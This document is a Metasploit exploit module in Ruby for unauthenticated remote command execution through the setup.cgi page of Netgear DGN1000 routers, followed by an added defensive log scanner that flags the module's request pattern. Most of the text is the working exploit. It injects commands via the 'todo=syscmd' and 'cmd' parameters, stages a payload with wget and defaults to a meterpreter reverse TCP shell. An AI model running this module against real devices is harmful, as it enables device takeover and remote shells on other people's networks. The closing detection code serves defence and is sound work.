Netgear DGN1000 Setup.cgi Remote Command Execution
Source: metasploit.com  Author: Mumbai  Published: 2017-10-25
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',
      'Description' => %q{
        This module exploits an unauthenticated OS command execution vulnerability
        in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and
        DGN2000v1 models.
        },
      'Author' => [
        'Mumbai <https://github.com/realoriginal>', # module
        'Robort Palerie <roberto@greyhats.it>' # vuln discovery
      ],
      'References' => [
          ['EDB', '25978'],
      ],
      'DisclosureDate' => 'Jun 5 2013',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSBE,
      'DefaultTarget' => 0,
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
      },
      'Privileged' => true,
      'Payload' => {
        'DisableNops' => true,
      },
      'Targets' => [[ 'Automatic', {} ]],
    ))
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => '/setup.cgi',
        'method' => 'GET'
        })
      if res && res.headers['WWW-Authenticate']
        auth = res.headers['WWW-Authenticate']
        if auth =~ /DGN1000/
          return Exploit::CheckCode::Detected
        end
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Connecting to target...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
    end

    print_status("#{peer} - Exploiting target ....")
    execute_cmdstager(
      :flavor => :wget,
      :linemax => 200,
      :concat_operator => " && "
    )
  end

  def execute_command(cmd, opts)
    begin
      res = send_request_cgi({
        'uri' => '/setup.cgi',
        'method' => 'GET',
        'vars_get' => {
          'next_file' => 'netgear.cfg',
          'todo' => 'syscmd',
          'cmd' => cmd.to_s,
          'curpath' => '/',
          'currentsetting.htm' => '1'
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
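
For defenders, the request that execute_command builds has a stable shape: a GET to /setup.cgi whose query carries todo=syscmd, a cmd value and currentsetting.htm. The following is an added example, not part of the original module: a log scanner that flags that shape. The log format, the sample lines and the helper names (decode_query, inspect_line, scan) are constructed for illustration, and matching case-insensitively is a deliberately lenient assumption.

```ruby
require 'uri'

# Constructed sample lines (not captured traffic), format: client "METHOD target VERSION".
SAMPLE_LOG = <<~LOG
  192.0.2.10 "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+test&curpath=/&currentsetting.htm=1 HTTP/1.1"
  192.0.2.11 "GET /setup.cgi?next_file=basic.htm HTTP/1.1"
  192.0.2.12 "GET /SETUP.CGI?todo=SysCmd&cmd=%65%63%68%6F&currentsetting.htm=1 HTTP/1.1"
  192.0.2.13 "GET /index.htm?todo=syscmd HTTP/1.1"
  192.0.2.14 "GET /setup.cgi?todo=syscmd&cmd=x HTTP/1.1"
LOG

LINE_RE = /\A(\S+) "(\S+) (\S+) [^"]*"/

# Decode a query string into a hash with lower-cased keys.
# Returns nil when the decoder rejects the input.
def decode_query(query)
  URI.decode_www_form(query).map { |k, v| [k.downcase, v] }.to_h
rescue ArgumentError
  nil
end

# Returns a finding hash when the request matches the module's pattern, else nil.
def inspect_line(line)
  m = LINE_RE.match(line)
  return nil unless m

  client, _method, target = m.captures
  path, _, query = target.partition('?')
  return nil unless path.downcase.end_with?('/setup.cgi')

  params = decode_query(query)
  if params.nil?
    # Undecodable query: fall back to a raw match so the request is not silently skipped.
    raw = query.downcase
    return nil unless raw.include?('todo=syscmd')
    return { client: client, cmd: nil, currentsetting: raw.include?('currentsetting.htm'), malformed: true }
  end
  return nil unless params['todo'].to_s.casecmp?('syscmd')

  { client: client, cmd: params['cmd'], currentsetting: params.key?('currentsetting.htm'), malformed: false }
end

# Scan a whole log and return only the findings.
def scan(log)
  log.each_line.map { |l| inspect_line(l.strip) }.compact
end

scan(SAMPLE_LOG).each { |f| puts f } if $PROGRAM_NAME == __FILE__
```

The decoded cmd value in each finding shows what the client asked the device to run, which matters most when the raw log line is percent-encoded.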

 